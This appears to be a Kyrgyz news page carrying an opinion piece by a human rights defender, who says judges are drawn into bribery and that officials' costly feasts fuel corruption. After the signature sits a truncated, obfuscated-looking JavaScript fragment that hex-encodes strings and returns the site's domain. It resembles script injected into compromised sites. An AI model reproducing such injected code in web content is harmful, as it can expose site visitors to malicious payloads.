Menu

Качкынбек Булатов, укук коргоочу; “Сот болуп иштесең, асмандан акча жаайт”

Бөлүшүү:

Жакында кызымды сотко кандидатураңды койбойсуңбу, жакшы такшалган юрист болуп калдың десем, “жок ата сотко барбайм” десе боло. Эмнеге десем, “жок ата сиз көп нерсени билбейт экенсиз, чогуу юридикалык академияны медаль менен бүткөн курбум жакында сынодон өтүп, сот болуп иштей баштады. Таптатынакай түз жүргөн курбум, сот болгондон бери күнүгө үй бетин көрбөй, үйгө кеч келип, сый урматтан колу бошобой калыптыр. Акырындык  менен ичкилик иче коёт экен. Угушума караганда акчалуу болуп, крутой авто унаа минип, жакшы мебель, кенен үйлүү болуптур. Анткени, кааласаң калабасаң дагы, бирөөнүн кылмыш ишин үстү жактан буйрук келгенде, бүтүрүгө туура келет. Ыгы келген жерден акча алып, өйдө шефке «отметка» берип турбасаң, кызматтан кетиришет же “подстава” уюштуруп жок кылмай адатка айланыптыр. Негизи кызмат өзү паралыкка үйрөтөт экен. Кыскасы, жанагы МАИ кызматкери пара албаса иштей албайт дегендей. Ошондуктан ыр чыры жок эле юрист болуп консультация берип токочубузду адал жеп, тынч уктап ызы- чуудан алыс болуп каргышка батпай эле жашаганыбыз оңго” дейт, кызым.

Өкмөт тойду токтоткула, акчанын баары тойго кетип эл жакырчылыкка кабылып жатат деп такай маселе көтөрүп чыгышат. Чын чынына келгенде ошо тойлор ар бир министрликтен башталып жатпайбы. Мисалы министрдын же орун басарларынын туулган күнү болуп калды дейлик, ошо министликте иштегендин барынан миң сомдон, кошоматчылар жүз доллардан өйдөлөп бере беришет. Андай майрамга бир айда беш- алтыдан өйдө болуп турат. Айына беш -алты миң сомду ража иретинде бергенден кийин, сегиз миң сом айлыктан эмнеси калат. «Иттин өлүгу ушу жерде жатат».

Акчанын барын ражага берип койгондон кийин кызматкер эмне кылат, айласыздан пара алганга жан талашат, мыйзам бузууга барып жатпайбы. Ошо тойлорду уюштурган, миллион акчаларды тойго жумшаган Ак үй, көк үйдөгү чиновниктер, анан калса президенттер өзүлөрү той берип доллар жыйнап жүргөнү калпы? Той коррупциянын булагы Ак үйдөн башталып, үлгү болуп жатканыңар жалганбы? Биринчи иретте тойду тыюга Ак үйдөн баштагыла, президентке жагынуу, жакындоо кошомат, тойдо болуп жатканы барыбызга белгилүү. Ошондуктан коррупция басылмак турсун, кайра өнүктүрүп жаткан Ажо, премьер – министр, калган чиновниктер мойнуңарга алсаңар болбойбу? Чындыгында кыргыздын салтты, үрп-адаты, мейман достугу, жердешчилик, тууганчылыктын барын сактабай таштап кетүүгө туура келбейт.

Анткени, эртең эле тууганчылыктан чыгып каласың. Ошондуктан жакын кишиңди суранып келсе кантип ишин бүтүрүп бербейсиң? Бир чети өтө таш боор ырайымсыздык кыргыздын үрп-адаты азап-тозокко түртөт. Бирөөгө жакшылык кылып, ошол эле убакта бирөөгө кайгы муң тартуулап, укугун тебелеп каргышын ала жыгыласың, айла жок акча кимди гана азгырбайт. Ушундай эки ачакей дилеммага туш болуп, өлкөнү пара, акча берип мыйзам тебеленип өнөкөткө айланбадыбы? Бир кылмыш ишти бүтүрүп, ыраазычылыгын алып коррупцияга өзүбүз түртүп жатканыбызды моюнга алыш керек.

Пара албай койсо, акелеп эжекелеп атып алдырып, мындай чыгып жамандаганыбыз дагы бар, же калпы? Бул ачуу чындык. Сот болуп иштсең, асмандан акча жаайт. Ушундай жат көрүнүштү тыя албаган, кыргыздын маңкурт, чабал бийлиги, мамлекет башкарганды билбеген, уурудан башы чыкпаган бийликтин эмнесин айтып күйөсүң. “Өрдөк жокто, чулдук бий” дегендей, өзүбүзгө жараша кемчонтой өлкө башчыга ээ болуп отурабыз. Жашасын Кыргызстандагы атка минер паракорлор!

Качкынбек БУЛАТОВ, укук коргоочу

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 69 − = 66

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: